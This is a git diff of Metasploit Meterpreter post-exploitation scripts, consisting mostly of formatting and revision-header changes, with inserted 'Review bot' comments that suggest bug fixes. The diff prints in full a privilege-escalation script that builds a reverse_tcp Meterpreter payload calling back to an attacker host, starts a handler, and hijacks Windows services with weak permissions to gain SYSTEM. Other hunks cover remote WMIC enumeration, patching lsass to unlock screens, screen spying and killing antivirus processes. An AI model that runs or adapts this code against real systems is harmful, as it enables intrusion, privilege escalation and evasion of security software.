diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb
index 22c68f4fc6..068a4b8512 100644
--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@@ -11,10 +11,10 @@ rpass = nil
trg = ""
# Script Options
@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-t" => [ true, "The target address"],
- "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
- "-p" => [ true, "Password of user on target system"]
+ "-h" => [ false, "Help menu."],
+ "-t" => [ true, "The target address"],
+ "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
+ "-p" => [ true, "Password of user on target system"]
)
# Create Filename info to be appended to downloaded files
@@ -57,28 +57,28 @@ def wmicexec(session,wmic,user,pass,trgt)
tmpout = ''
command = nil
runfail = 0
- runningas = session.sys.config.getuid
+ runningas = session.sys.config.getuid
begin
- tmp = session.fs.file.expand_path("%TEMP%")
- # Temporary file on windows host to store results
- wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
-
- wmic.each do |wmi|
- if user == nil
- print_status("The commands will be ran under the credentials of #{runningas}")
- command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
- else
- command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
- end
- print_status "\trunning command wimic #{wmi}"
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- #print_status "\twmic #{command}"
- r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
+ tmp = session.fs.file.expand_path("%TEMP%")
+ # Temporary file on windows host to store results
+ wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
+
+ wmic.each do |wmi|
+ if user == nil
+ print_status("The commands will be ran under the credentials of #{runningas}")
+ command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
+ else
+ command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
+ end
+ print_status "\trunning command wimic #{wmi}"
+ r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
+ sleep(1)
+ #print_status "\twmic #{command}"
+ r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
#Making sure that wmic finishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
@@ -92,17 +92,17 @@ def wmicexec(session,wmic,user,pass,trgt)
end
end
end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- # Close output file in host
- wmioutfile.close
+ r.close
+ end
+ # Read the output file of the wmic commands
+ wmioutfile = session.fs.file.new(wmicfl, "rb")
+ until wmioutfile.eof?
+ tmpout << wmioutfile.read
+ end
+ # Close output file in host
+ wmioutfile.close
rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
+ print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
@@ -123,21 +123,19 @@ def headerbuid(session,target,dest)
header << "\n\n\n"
print_status("Saving report to #{dest}")
- header
+ header
end
#------------------------------------------------------------------------------
# Function Help Message
def helpmsg
- print(
- "Remote Windows Enumeration Meterpreter Script\n" +
- "This script will enumerate windows hosts in the target enviroment\n" +
- "given a username and password or using the credential under witch\n" +
- "Meterpeter is running using WMI wmic windows native tool.\n" +
- "Usage:\n" +
- @@exec_opts.usage
- )
+ print("Remote Windows Enumeration Meterpreter Script\n" +
+ "This script will enumerate windows hosts in the target enviroment\n" +
+ "given a username and password or using the credential under witch\n" +
+ "Meterpeter is running using WMI wmic windows native tool.\n" +
+ "Usage:\n" +
+ @@exec_opts.usage)
end
################## MAIN ##################
if client.platform =~ /win32|win64/
diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb
index af76c1bf2b..2190f46808 100644
--- a/scripts/meterpreter/scheduleme.rb
+++ b/scripts/meterpreter/scheduleme.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for automating the most common scheduling tasks
#during a pentest. This script will use the schtasks command so as
diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb
index 39745b4a5f..b8081f7c3d 100644
--- a/scripts/meterpreter/schelevator.rb
+++ b/scripts/meterpreter/schelevator.rb
@@ -1,5 +1,6 @@
##
# $Id$
+# $Revision$
##
##
diff --git a/scripts/meterpreter/schtasksabuse.rb b/scripts/meterpreter/schtasksabuse.rb
index d698977950..12d0318911 100644
--- a/scripts/meterpreter/schtasksabuse.rb
+++ b/scripts/meterpreter/schtasksabuse.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
#Meterpreter script for abusing the scheduler service in windows
#by scheduling and running a list of command against one or more targets
@@ -127,20 +128,20 @@ end
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
+ else
+ ::File.open(script, "r").each_line do |line|
commands << line.chomp
end
- end
+ end
when "-l"
list = val
if not ::File.exists?(list)
raise "Command List File does not exists!"
- else
- ::File.open(list, "r").each_line do |line|
+ else
+ ::File.open(list, "r").each_line do |line|
targets << line.chomp
end
- end
+ end
when "-h"
help = 1
end
diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb
index 6f44439c35..c6e51123ce 100644
--- a/scripts/meterpreter/screen_unlock.rb
+++ b/scripts/meterpreter/screen_unlock.rb
@@ -1,10 +1,14 @@
#
+# $Id$
+#
# Script to unlock a windows screen by L4teral
# Needs system prvileges to run and known signatures for the target system.
# This script patches msv1_0.dll loaded by lsass.exe
#
# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
#
+# $Revision$
+#
revert = false
targets = [
@@ -40,7 +44,7 @@ os = client.sys.config.sysinfo['OS']
targets.each do |t|
if os =~ t[:os]
- target = t
+ target = t
print_status("OS '#{os}' found in known targets")
pid = client.sys.process["lsass.exe"]
p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb
index 7cadba211b..e10eb2892e 100644
--- a/scripts/meterpreter/screenspy.rb
+++ b/scripts/meterpreter/screenspy.rb
@@ -1,7 +1,7 @@
# $Id$
# $Revision$
# Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
-#
+#
# Thie script will open an interactive view of remote hosts
# You will need firefox installed on your machine
@@ -9,9 +9,9 @@
require 'fileutils'
opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-d" => [ true, "The Delay in seconds between each screenshot." ],
- "-t" => [ true, "The time to run in sec." ],
+ "-h" => [ false, "Help menu." ],
+ "-d" => [ true, "The Delay in seconds between each screenshot." ],
+ "-t" => [ true, "The time to run in sec." ],
"-s" => [ true, "The local system linux/windows" ]
)
@@ -22,28 +22,28 @@ meter_type = client.platform
localsys = "linux"
opts.parse(args) { |opt, idx, val|
- case opt
- when '-d'
- freq = val.to_i
- when '-t'
- count = val.to_i
+ case opt
+ when '-d'
+ freq = val.to_i
+ when '-t'
+ count = val.to_i
when '-s'
- localsys = val.to_s
-
- when "-h"
+ localsys = val.to_s
+
+ when "-h"
+ print_line
+ print_line "Screenspy v1.0"
+ print_line "--------------"
print_line
- print_line "Screenspy v1.0"
- print_line "--------------"
- print_line
print_line
print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
print_line
print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com"
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ end
}
# Wrong Meterpreter Version Message Function
@@ -72,7 +72,7 @@ outfile = ::File.join(Msf::Config.log_directory,file)
begin
process2mig = "explorer.exe"
-
+
# Actual migration
mypid = session.sys.process.getpid
session.sys.process.get_processes().each do |x|
@@ -100,9 +100,9 @@ begin
f2.puts(data)
end
-
+
if (localsys == "windows")
-
+
print_status("Runing in local mode => windows")
print_status("Opening Interactive view...")
localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
@@ -111,33 +111,35 @@ begin
print_status("Opening Interactive view...")
localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html&\""
end
-
+
system (localcmd)
- (1..count).each do |i|
+ (1..count).each do |i|
sleep(freq) if(i != 1)
path = File.join(logs,"screenshot.jpeg")
- data = session.espia.espia_image_get_dev_screen
-
- if(data)
- ::File.open(path, 'wb') do |fd|
- fd.write(data)
+ data = session.espia.espia_image_get_dev_screen
+
+ if(data)
+ ::File.open(path, 'wb') do |fd|
+ fd.write(data)
fd.close()
end
- end
-
-
-
+ end
end
+
rescue ::Exception => e
print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
end
print_status("The interactive Session ended...")
- data="#{host} - Interactive Session ended
"
- File.open(path1, 'w') do |f2|
+ data = <<-EOS
+#{host} - Interactive Session ended
+
+
+EOS
+ File.open(path1, 'w') do |f2|
f2.puts(data)
- end
-
+ end
+
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
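Review bot: `system (localcmd)` near the top of the hunk hands one string to the operator's local shell, and that string interpolates `host` and `Msf::Config.install_root` (the linux form is on the hunk's second line, the windows form in the preceding hunk), so any shell metacharacter in `host` is executed locally. `host` is assigned outside the hunk, so whether it can carry session-derived text is not visible here; if it can, the argument form `system("firefox", "-width", "530", "-height", "660", url)` bypasses shell parsing, and otherwise a check that `host` contains only hostname/address characters before it is interpolated would suffice. The heredoc that replaces the old literal also appends two blank lines to `data`, which `f2.puts` then writes to the file; if that is unintended the heredoc body should end right after the `#{host}` line. Both `begin` blocks closed by this hunk's `rescue ::Exception` clauses start outside the hunk; `rescue ::Exception` also catches `Interrupt` and `SystemExit`, so `rescue => e` is the safer form unless a non-StandardError is deliberately expected here.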
diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb
index 3cb7b1eac9..9562457d46 100644
--- a/scripts/meterpreter/search_dwld.rb
+++ b/scripts/meterpreter/search_dwld.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
## Meterpreter script that recursively search and download
## files matching a given pattern
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
index 2081f66054..5647079650 100644
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -1,201 +1,203 @@
-##
-# $Id: service_permissions_escalate.rb scriptjunkie $
-#
-# Many services are configured with insecure permissions. This
-# script attempts to create a service, then searches through a list of
-# existing services to look for insecure file or configuration
-# permissions that will let it replace the executable with a payload.
-# It will then attempt to restart the replaced service to run the
-# payload. If that fails, the next time the service is started (such as
-# on reboot) the attacker will gain elevated privileges.
-#
-# scriptjunkie googlemail com
-##
-
-if client.platform !~ /win32/
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-aggressive = false
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
- case opt
- when "-a"
- aggressive = true
- when "-h"
- print_status("Generic weak service permissions privilege escalation.")
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
-end
-
-# Get the exe payload.
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-raw = pay.generate
-exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-#and placing it on the target in %TEMP%
-tempdir = client.fs.file.expand_path("%TEMP%")
-tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = tempdir + "\\" + tempexename + ".exe"
-print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
-fd = client.fs.file.new(tempexe, "wb")
-fd.write(exe)
-fd.close
-
-#get handler to be ready
-handler = client.framework.exploits.create("multi/handler")
-handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-handler.datastore['LHOST'] = rhost
-handler.datastore['LPORT'] = rport
-handler.datastore['InitialAutoRunScript'] = "migrate -f"
-handler.datastore['ExitOnSession'] = false
-#start a handler to be ready
-handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
-)
-
-#attempt to make new service
-client.railgun.kernel32.LoadLibraryA("advapi32.dll")
-client.railgun.get_dll('advapi32')
-client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
- [ "DWORD", "hService", "in" ]
-])
-
-#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
-
-print_status("Trying to add a new service...")
-adv = client.railgun.advapi32
-manag = adv.OpenSCManagerA(nil,nil,0x10013)
-if(manag["return"] != 0)
- # SC_MANAGER_CREATE_SERVICE = 0x0002
- newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
- #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
- #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
- if(newservice["return"] != 0)
- print_status("Created service... #{newservice["return"]}")
- ret = adv.StartServiceA(newservice["return"], 0, nil)
- print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
- service_delete("walservice")
- adv.CloseServiceHandle(newservice["return"])
- if aggressive == false
- adv.CloseServiceHandle(manag["return"])
- raise Rex::Script::Completed
- end
- else
- print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
- end
-else
- print_status("No privs to create a service...")
- manag = adv.OpenSCManagerA(nil,nil,1)
- if(manag["return"] == 0)
- print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
- end
-end
-print_status("Trying to find weak permissions in existing services..")
-#Search through list of services to find weak permissions, whether file or config
-serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-#for each service
-service_list.each do |serv|
- begin
- srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
- if srvtype != "16"
- continue
- end
- moved = false
- configed = false
- #default path, but there should be an ImagePath registry key
- source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
- #get path to exe; parse out quotes and arguments
- sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
- sourcemaybe = client.fs.file.expand_path(sourceorig)
- if( sourcemaybe[0] == '"' )
- sourcemaybe = sourcemaybe.split('"')[1]
- else
- sourcemaybe = sourcemaybe.split(' ')[0]
- end
- begin
- client.fs.file.stat(sourcemaybe) #check if it really exists
- source = sourcemaybe
- rescue
- print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
- end
- #try to exploit weak file permissions
- if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
- client.railgun.kernel32.CopyFileA(tempexe, source, false)
- print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
- moved = true
- end
- #try to exploit weak config permissions
- #open with SERVICE_CHANGE_CONFIG (0x0002)
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- if(servhandleret["return"] != 0)
- #SERVICE_NO_CHANGE is 0xFFFFFFFF
- if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
- print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
- configed = true
- end
- adv.CloseServiceHandle(servhandleret["return"])
-
- end
- if(moved != true && configed != true)
- print_status("No exploitable weak permissions found on #{serv}")
- continue
- end
- print_status("Restarting #{serv}")
- #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
- servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
- if(servhandleret["return"] != 0)
- #SERVICE_CONTROL_STOP = 0x00000001
- if(adv.ControlService(servhandleret["return"],1,56))
- client.railgun.kernel32.Sleep(1000)
- adv.StartServiceA(servhandleret["return"],0,nil)
- print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
- #Cleanup
- if moved == true
- client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
- end
- if configed == true
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
- adv.CloseServiceHandle(servhandleret["return"])
- end
- if aggressive == false
- raise Rex::Script::Completed
- end
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- adv.CloseServiceHandle(servhandleret["return"])
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- rescue
- end
-end
-
+##
+# $Id$
+#
+# Many services are configured with insecure permissions. This
+# script attempts to create a service, then searches through a list of
+# existing services to look for insecure file or configuration
+# permissions that will let it replace the executable with a payload.
+# It will then attempt to restart the replaced service to run the
+# payload. If that fails, the next time the service is started (such as
+# on reboot) the attacker will gain elevated privileges.
+#
+# scriptjunkie googlemail com
+#
+# $Revision$
+##
+
+if client.platform !~ /win32/
+ print_error("This version of Meterpreter is not supported with this Script!")
+ raise Rex::Script::Completed
+end
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+ "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
+ "-h" => [ false, "This help menu"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+aggressive = false
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+ case opt
+ when "-a"
+ aggressive = true
+ when "-h"
+ print_status("Generic weak service permissions privilege escalation.")
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
+end
+
+# Get the exe payload.
+pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+pay.datastore['LHOST'] = rhost
+pay.datastore['LPORT'] = rport
+raw = pay.generate
+exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+#and placing it on the target in %TEMP%
+tempdir = client.fs.file.expand_path("%TEMP%")
+tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
+tempexe = tempdir + "\\" + tempexename + ".exe"
+print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
+fd = client.fs.file.new(tempexe, "wb")
+fd.write(exe)
+fd.close
+
+#get handler to be ready
+handler = client.framework.exploits.create("multi/handler")
+handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+handler.datastore['LHOST'] = rhost
+handler.datastore['LPORT'] = rport
+handler.datastore['InitialAutoRunScript'] = "migrate -f"
+handler.datastore['ExitOnSession'] = false
+#start a handler to be ready
+handler.exploit_simple(
+ 'Payload' => handler.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+)
+
+#attempt to make new service
+client.railgun.kernel32.LoadLibraryA("advapi32.dll")
+client.railgun.get_dll('advapi32')
+client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
+ [ "DWORD", "hService", "in" ]
+])
+
+#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
+
+print_status("Trying to add a new service...")
+adv = client.railgun.advapi32
+manag = adv.OpenSCManagerA(nil,nil,0x10013)
+if(manag["return"] != 0)
+ # SC_MANAGER_CREATE_SERVICE = 0x0002
+ newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
+ #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
+ #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
+ if(newservice["return"] != 0)
+ print_status("Created service... #{newservice["return"]}")
+ ret = adv.StartServiceA(newservice["return"], 0, nil)
+ print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
+ service_delete("walservice")
+ adv.CloseServiceHandle(newservice["return"])
+ if aggressive == false
+ adv.CloseServiceHandle(manag["return"])
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
+ end
+else
+ print_status("No privs to create a service...")
+ manag = adv.OpenSCManagerA(nil,nil,1)
+ if(manag["return"] == 0)
+ print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
+ end
+end
+print_status("Trying to find weak permissions in existing services..")
+#Search through list of services to find weak permissions, whether file or config
+serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
+#for each service
+service_list.each do |serv|
+ begin
+ srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
+ if srvtype != "16"
+ continue
+ end
+ moved = false
+ configed = false
+ #default path, but there should be an ImagePath registry key
+ source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+ #get path to exe; parse out quotes and arguments
+ sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
+ sourcemaybe = client.fs.file.expand_path(sourceorig)
+ if( sourcemaybe[0] == '"' )
+ sourcemaybe = sourcemaybe.split('"')[1]
+ else
+ sourcemaybe = sourcemaybe.split(' ')[0]
+ end
+ begin
+ client.fs.file.stat(sourcemaybe) #check if it really exists
+ source = sourcemaybe
+ rescue
+ print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
+ end
+ #try to exploit weak file permissions
+ if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
+ client.railgun.kernel32.CopyFileA(tempexe, source, false)
+ print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
+ moved = true
+ end
+ #try to exploit weak config permissions
+ #open with SERVICE_CHANGE_CONFIG (0x0002)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ if(servhandleret["return"] != 0)
+ #SERVICE_NO_CHANGE is 0xFFFFFFFF
+ if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
+ print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
+ configed = true
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+
+ end
+ if(moved != true && configed != true)
+ print_status("No exploitable weak permissions found on #{serv}")
+ continue
+ end
+ print_status("Restarting #{serv}")
+ #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
+ if(servhandleret["return"] != 0)
+ #SERVICE_CONTROL_STOP = 0x00000001
+ if(adv.ControlService(servhandleret["return"],1,56))
+ client.railgun.kernel32.Sleep(1000)
+ adv.StartServiceA(servhandleret["return"],0,nil)
+ print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
+ #Cleanup
+ if moved == true
+ client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
+ end
+ if configed == true
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
+ adv.CloseServiceHandle(servhandleret["return"])
+ end
+ if aggressive == false
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ rescue
+ end
+end
+
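Review bot: `continue` on the new-side lines after `if srvtype != "16"` and after the "No exploitable weak permissions" message is not a Ruby keyword; each call raises NameError, which the bare `rescue` at the end of the per-service `begin` block then swallows, so the loop advances only by accident and that same `rescue` hides every real railgun or registry failure for the service. Both should be `next`, and the bare `rescue` should at least report what it caught, e.g. `rescue => e` followed by `print_error("#{serv}: #{e.class} #{e}")`. Separately, `if(adv.ChangeServiceConfigA(...))` and `if(adv.ControlService(...))` test the returned result hash itself, which is always truthy; the `MoveFileA` call a few lines earlier shows the intended pattern, so these conditions need `["return"] != 0` on the call, otherwise "has weak configuration permissions" is printed and `configed` set even when the call failed. This hunk replaces the whole file, so none of its blocks is cut at the hunk edge.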
diff --git a/scripts/meterpreter/sound_recorder.rb b/scripts/meterpreter/sound_recorder.rb
index 1a6a6c75ce..f9a75fa61e 100644
--- a/scripts/meterpreter/sound_recorder.rb
+++ b/scripts/meterpreter/sound_recorder.rb
@@ -80,7 +80,7 @@ end
}
# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
+wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
# Create Folder for logs and get path for logs
if not log_folder
diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb
index dd11c7c4db..dc659d132e 100644
--- a/scripts/meterpreter/srt_webdrive_priv.rb
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
@@ -63,7 +64,8 @@ opts.parse(args) do |opt, idx, val|
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
- client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+ client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
+ nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index 1c7be60da4..26ce4672e4 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
session = client
@@exec_opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/virtualbox_sysenter_dos.rb b/scripts/meterpreter/virtualbox_sysenter_dos.rb
index 147ad65020..a472d42035 100644
--- a/scripts/meterpreter/virtualbox_sysenter_dos.rb
+++ b/scripts/meterpreter/virtualbox_sysenter_dos.rb
@@ -3,6 +3,8 @@
# Meterpreter script for triggering the VirtualBox DoS published at:
# http://milw0rm.com/exploits/9323
+# $Revision$
+
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb
old mode 100755
new mode 100644
index da0fc22ac2..33508b76e5
--- a/scripts/meterpreter/virusscan_bypass.rb
+++ b/scripts/meterpreter/virusscan_bypass.rb
@@ -1,205 +1,208 @@
-# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
-# order which keeps VirusScan icon visible at system tray without disabled sign on it.
-# Additionally it lets you disable On Access Scanner from registry, upload your detectable
-# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
-# registry key. (Requires administrator privilege. Tested on XP SP3)
-#
-# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
-#
-# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
-
-session = client
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-k" => [ false,"Only kills VirusScan processes"],
- "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
-)
-
-################## function declaration Declarations ##################
-def usage()
- print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
